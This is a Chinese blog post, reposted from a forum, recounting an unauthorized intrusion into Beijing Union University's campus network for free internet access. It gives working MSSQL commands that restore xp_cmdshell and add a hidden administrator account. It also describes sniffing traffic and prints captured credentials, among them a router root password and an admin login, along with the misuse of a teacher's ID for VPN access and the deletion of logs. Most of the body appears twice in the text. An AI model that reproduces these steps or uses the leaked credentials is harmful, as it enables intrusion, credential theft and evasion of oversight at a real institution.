北京联合大学内网渗透小记
作者:admin | 时间:2017-5-6 11:50:45 | 分类:黑客技术 隐藏侧边栏展开侧边栏
故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...
data:image/s3,"s3://crabby-images/be39b/be39bac235a4523e24413afb1b3819cd443c2851" alt=""
data:image/s3,"s3://crabby-images/814d9/814d9545379afc2ffdbf599f065dda0d9f348094" alt=""
校园内网渗透有几个思路,WEB渗透,MSQSQL弱口令提权,MYSQL弱口令提权,3389爆破...等.小逸就先从数据库弱口令开始吧.请出短小精悍的S扫描器,扫局域网网段内的1433端口,
data:image/s3,"s3://crabby-images/7f050/7f0500fad4b2aca7e4584181955a4775e42add1c" alt=""
扫出IP后整理成文本用scan(图片中我重命名了scan)挂字典批量扫MSSQL弱口令.
data:image/s3,"s3://crabby-images/83437/83437aeb9d569abd584cf2fd75dbf078eac48592" alt=""
开始穷举字典中的密码,匹配的保存为M.txt文本
data:image/s3,"s3://crabby-images/37b1c/37b1c953d7ed19763c687bab0fdd96303c645ea1" alt=""
弱口令出来了,用SQL查询分析器(修正版)连接数据库,利用常用存储扩展提权,提权的代码度娘上泛滥.我会上传在附件中.
先查看是否开启终端(不开启用命令开启),终端端口为多少
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
data:image/s3,"s3://crabby-images/27959/27959303a5a6c697a926fb2275852979d46457a3" alt=""
恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
data:image/s3,"s3://crabby-images/37896/3789633317c6ae892af9c1343b4dc2dd3d47092c" alt=""
xp_cmdshell添加用户:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master.dbo.xp_cmdshell 'net user CkDebug 123456 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators CkDebug /add'
data:image/s3,"s3://crabby-images/3d7e4/3d7e480e6a55ac26d8d43a860b86ad1d22eb95ff" alt=""
成功建立帐号 CkDebug \123456
data:image/s3,"s3://crabby-images/3c58b/3c58b4cb9b3476ec02b45ff600ae2a67dd4c649c" alt=""
表中不少敏感信息,怕被查水表我就不贴全图了.(仅供测试,过后我会把帐号删除)
data:image/s3,"s3://crabby-images/95795/9579585890d0ab29a3b9f0ef7355adb41a3c4a79" alt=""
价值不大,不过目的已经达到,最终小逸建立了VPN达到了绕过验证上网的目的.
基本上扫出的弱口令都能提权,下面贴下几个图
data:image/s3,"s3://crabby-images/d3d5b/d3d5bf0f2eb5f848c25d51fd34317c6460f4f150" alt=""
(16核心8G服务器)
data:image/s3,"s3://crabby-images/12d84/12d842edb1d0ec625124fd774ced0aa71e14049a" alt=""
(计费管理系统)
思路和手法都一样,我就不重复了.目的也已经达到,架设了VPN免费上网..但美中不足的是被限速了,服务器里下载速度可以达到100M独享,本地链接服务器VPN只是100KB左右(听说上一期师兄也用服务器代理,下载速度也是60M每秒.前段时间被管理员发现了所以限速了)我猜想是连接到BUU无线这被限制了速度,接入内网的时候限速了.想到两个解决思路.第一接WAN(教室内有网线,教室附近有机箱.弄个迷你路由接有限然后ap热点.).第二继续渗透路由,修改限速.(毕竟第一个比较危险,被发现的时候一抓一个准).
在服务器中嗅探抓包.
data:image/s3,"s3://crabby-images/e64dd/e64dda05e87b7140737812a12122a41175f97cea" alt=""
data:image/s3,"s3://crabby-images/16b86/16b865f787c10db43a292401e9836fc71ae0123c" alt=""
card.buu.edu.cn/homeLogin.action是校园卡查询系统,嗅探到帐号(学号和密码),最后经过测试,校园卡一卡通的帐号能查询饭卡,登录BUU验证等,作用很大....(工号位数比较短的是教师的工号,最后发现,这工号作用很大)
data:image/s3,"s3://crabby-images/31003/310030a5789069c51e44d302f316659d40f9187b" alt=""
嗅探出
http://192.168.192.14/web 路由
root bshdl-97h
data:image/s3,"s3://crabby-images/a251e/a251e26b5def852b8feef2efa12df6d3eecd83a4" alt=""
data:image/s3,"s3://crabby-images/a7133/a7133fd914359057cd1e1e6003545d09212d269d" alt=""
嗅探出http://1.202.89.6/muc/login.action
admin MUNCAdministrator
data:image/s3,"s3://crabby-images/4c75a/4c75ad2da4679579c692a9f74a912c0815e27d45" alt=""
嗅探出的敏感密码太多 我就不一一列举了,下面小逸就讲讲利用嗅探到的密码继续渗透
data:image/s3,"s3://crabby-images/d403f/d403f225f478a206658871fe7aa964e03fbd4cc5" alt=""
利用得到的工号和密码登录上了BUU.又一个办法免费上网了....
data:image/s3,"s3://crabby-images/b8bcb/b8bcb886ac13edf4c43d92ee223d2ffc5e559224" alt=""
在外网可以利用教师的工号登录SSL VPN
data:image/s3,"s3://crabby-images/3fb6f/3fb6f1e1ca6e32b40dd79b62d03193e158f39742" alt=""
data:image/s3,"s3://crabby-images/24d2f/24d2f66f3e651e4156053efde7fd8bbdb2502e19" alt=""
data:image/s3,"s3://crabby-images/5b780/5b780b2788fe61338bc8d90eb345efb532f14190" alt=""
data:image/s3,"s3://crabby-images/a508f/a508fc102fa5aea189c851fafeb79c7bb2e3b588" alt=""
data:image/s3,"s3://crabby-images/48a76/48a7657a9a7704fd088f5544951e9ca26033026e" alt=""
data:image/s3,"s3://crabby-images/c2e3a/c2e3abf186ec41bcac4fbc84fa8f3130b15e4866" alt=""
data:image/s3,"s3://crabby-images/ade0c/ade0c02a13bd2f5a58cc235c2375b9cbe9f95211" alt=""
data:image/s3,"s3://crabby-images/cf0d2/cf0d2c7f5ebe196fa7e11d4a7044121599a9ae31" alt=""
收集这些信息要是被有心人社工,估计,,,,,
MYSQL弱口令也测试过,利用查询命令也可以root.
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...
data:image/s3,"s3://crabby-images/be39b/be39bac235a4523e24413afb1b3819cd443c2851" alt=""
data:image/s3,"s3://crabby-images/814d9/814d9545379afc2ffdbf599f065dda0d9f348094" alt=""
校园内网渗透有几个思路,WEB渗透,MSQSQL弱口令提权,MYSQL弱口令提权,3389爆破...等.小逸就先从数据库弱口令开始吧.请出短小精悍的S扫描器,扫局域网网段内的1433端口,
data:image/s3,"s3://crabby-images/7f050/7f0500fad4b2aca7e4584181955a4775e42add1c" alt=""
扫出IP后整理成文本用scan(图片中我重命名了scan)挂字典批量扫MSSQL弱口令.
data:image/s3,"s3://crabby-images/83437/83437aeb9d569abd584cf2fd75dbf078eac48592" alt=""
开始穷举字典中的密码,匹配的保存为M.txt文本
data:image/s3,"s3://crabby-images/37b1c/37b1c953d7ed19763c687bab0fdd96303c645ea1" alt=""
弱口令出来了,用SQL查询分析器(修正版)连接数据库,利用常用存储扩展提权,提权的代码度娘上泛滥.我会上传在附件中.
先查看是否开启终端(不开启用命令开启),终端端口为多少
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
data:image/s3,"s3://crabby-images/27959/27959303a5a6c697a926fb2275852979d46457a3" alt=""
恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
data:image/s3,"s3://crabby-images/37896/3789633317c6ae892af9c1343b4dc2dd3d47092c" alt=""
xp_cmdshell添加用户:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master.dbo.xp_cmdshell 'net user CkDebug 123456 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators CkDebug /add'
data:image/s3,"s3://crabby-images/3d7e4/3d7e480e6a55ac26d8d43a860b86ad1d22eb95ff" alt=""
成功建立帐号 CkDebug \123456
data:image/s3,"s3://crabby-images/3c58b/3c58b4cb9b3476ec02b45ff600ae2a67dd4c649c" alt=""
表中不少敏感信息,怕被查水表我就不贴全图了.(仅供测试,过后我会把帐号删除)
data:image/s3,"s3://crabby-images/95795/9579585890d0ab29a3b9f0ef7355adb41a3c4a79" alt=""
价值不大,不过目的已经达到,最终小逸建立了VPN达到了绕过验证上网的目的.
基本上扫出的弱口令都能提权,下面贴下几个图
data:image/s3,"s3://crabby-images/d3d5b/d3d5bf0f2eb5f848c25d51fd34317c6460f4f150" alt=""
(16核心8G服务器)
data:image/s3,"s3://crabby-images/12d84/12d842edb1d0ec625124fd774ced0aa71e14049a" alt=""
(计费管理系统)
思路和手法都一样,我就不重复了.目的也已经达到,架设了VPN免费上网..但美中不足的是被限速了,服务器里下载速度可以达到100M独享,本地链接服务器VPN只是100KB左右(听说上一期师兄也用服务器代理,下载速度也是60M每秒.前段时间被管理员发现了所以限速了)我猜想是连接到BUU无线这被限制了速度,接入内网的时候限速了.想到两个解决思路.第一接WAN(教室内有网线,教室附近有机箱.弄个迷你路由接有限然后ap热点.).第二继续渗透路由,修改限速.(毕竟第一个比较危险,被发现的时候一抓一个准).
在服务器中嗅探抓包.
data:image/s3,"s3://crabby-images/e64dd/e64dda05e87b7140737812a12122a41175f97cea" alt=""
data:image/s3,"s3://crabby-images/16b86/16b865f787c10db43a292401e9836fc71ae0123c" alt=""
card.buu.edu.cn/homeLogin.action是校园卡查询系统,嗅探到帐号(学号和密码),最后经过测试,校园卡一卡通的帐号能查询饭卡,登录BUU验证等,作用很大....(工号位数比较短的是教师的工号,最后发现,这工号作用很大)
data:image/s3,"s3://crabby-images/31003/310030a5789069c51e44d302f316659d40f9187b" alt=""
嗅探出
http://192.168.192.14/web 路由
root bshdl-97h
data:image/s3,"s3://crabby-images/a251e/a251e26b5def852b8feef2efa12df6d3eecd83a4" alt=""
data:image/s3,"s3://crabby-images/a7133/a7133fd914359057cd1e1e6003545d09212d269d" alt=""
嗅探出http://1.202.89.6/muc/login.action
admin MUNCAdministrator
data:image/s3,"s3://crabby-images/4c75a/4c75ad2da4679579c692a9f74a912c0815e27d45" alt=""
嗅探出的敏感密码太多 我就不一一列举了,下面小逸就讲讲利用嗅探到的密码继续渗透
data:image/s3,"s3://crabby-images/d403f/d403f225f478a206658871fe7aa964e03fbd4cc5" alt=""
利用得到的工号和密码登录上了BUU.又一个办法免费上网了....
data:image/s3,"s3://crabby-images/b8bcb/b8bcb886ac13edf4c43d92ee223d2ffc5e559224" alt=""
在外网可以利用教师的工号登录SSL VPN
data:image/s3,"s3://crabby-images/3fb6f/3fb6f1e1ca6e32b40dd79b62d03193e158f39742" alt=""
data:image/s3,"s3://crabby-images/24d2f/24d2f66f3e651e4156053efde7fd8bbdb2502e19" alt=""
data:image/s3,"s3://crabby-images/5b780/5b780b2788fe61338bc8d90eb345efb532f14190" alt=""
data:image/s3,"s3://crabby-images/a508f/a508fc102fa5aea189c851fafeb79c7bb2e3b588" alt=""
data:image/s3,"s3://crabby-images/48a76/48a7657a9a7704fd088f5544951e9ca26033026e" alt=""
data:image/s3,"s3://crabby-images/c2e3a/c2e3abf186ec41bcac4fbc84fa8f3130b15e4866" alt=""
data:image/s3,"s3://crabby-images/ade0c/ade0c02a13bd2f5a58cc235c2375b9cbe9f95211" alt=""
data:image/s3,"s3://crabby-images/cf0d2/cf0d2c7f5ebe196fa7e11d4a7044121599a9ae31" alt=""
收集这些信息要是被有心人社工,估计,,,,,
MYSQL弱口令也测试过,利用查询命令也可以root.
还有不少敏感的网址和密码我就不一一截图了,既然目的已经达到了,就风扯吧,此次渗透只是测试,已经把日志和所建的帐号删除,请大大勿跨省.
转自看雪论坛,作者:CkDebug